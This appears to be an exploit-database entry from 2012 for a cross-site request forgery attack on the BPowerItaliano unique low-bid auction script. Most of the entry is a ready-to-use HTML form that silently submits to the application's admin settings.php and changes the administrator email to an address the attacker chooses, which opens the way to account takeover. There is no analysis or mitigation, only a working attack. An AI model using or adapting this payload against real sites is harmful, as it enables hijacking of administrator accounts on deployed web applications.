BPowerItaliano CSRF



EKU-ID: 1661 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: BPowerItaliano CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/bpoweritaliano-unique-low-bid-auction-italian-ver/27150/
# Category::  webapps
# Demo : http://icloudcenter.net/demos/iclowbidauction//admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com




<form method="POST" action="target.com/[PATH]/settings.php" name="conf">
<input type="hidden" value="yourmail@mail.com" maxlength="100" size="45" name="adminmail"/>
<input type="submit" value="Save changes" name="act"/>
</form>